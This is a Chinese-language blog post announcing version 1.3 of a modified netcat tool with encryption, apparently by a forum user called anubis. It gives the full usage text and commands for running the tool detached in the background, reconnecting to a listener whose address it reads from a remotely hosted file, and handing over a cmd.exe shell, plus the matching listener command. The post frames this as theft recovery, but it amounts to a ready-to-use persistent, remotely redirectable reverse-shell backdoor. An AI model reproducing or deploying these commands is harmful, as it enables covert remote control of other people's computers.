NC瑞士军刀增强版[v1.3]

旧版 v1.2文章


v1.3版本  下载地址

    new features:

            支持读取FTP文件配置反向连接的ip地址和端口.即 支撑FTP空间上传,从而可以随时改变反向连接的客户端地址。

 场景: 保护自己的电脑

       可以在自己电脑上安装服务器程序, 如果电脑丢失可以通过修改FTP空间IP文件来指向连接到的客户端,返回服务端的 cmd.exe 执行权限。


   

[v1.30 NT] updated by anubis. forum: www.cnanubis.cn Q:93665673
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
                        nc -R hostname port[s] [ports] ...
            [v.1.3]     enc  -R -vv -d xxx.xxx.xxx.xxx 888 -i 5 -k 123 -F http://ccc.ccc.ccc.ccc/ip.txt >> enc -e cmd.exe
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -k key          secret key to use for encryption.default "anubis"
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -R              connect harder, re-connect on socket close
        -F file         read ftp file in order to parser host & port (file is ftp file)
        -f              installed as service
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
                        port numbers can be individual or ranges: m-n [inclusive]

添加参数 -F 为 FTP 文件地址

shell :

     服务端执行:       

enc  -R -vv -d xxx.xxx.xxx.xxx 888 -i 5 -k 123 -F http://ccc.ccc.ccc.ccc/ip.txt >> enc -e cmd.exe

其中  

xxx.xxx.xxx.xxx 888 一定要写 但是可以随便写 , 因为有 -F 参数 就会从FTP空间去找主机和端口

文件空间数据格式    域名:端口

NC瑞士军刀增强版[v1.3]_第1张图片


客户端:和以前一样 打开监听端口

enc -vv -L -p 8888 -k 123


这样就能知道服务器IP  也能有执行cmd.exe权限了。

保护自己电脑的小工具 很不错的。  

好了 收工了。










你可能感兴趣的:(NC瑞士军刀增强版[v1.3])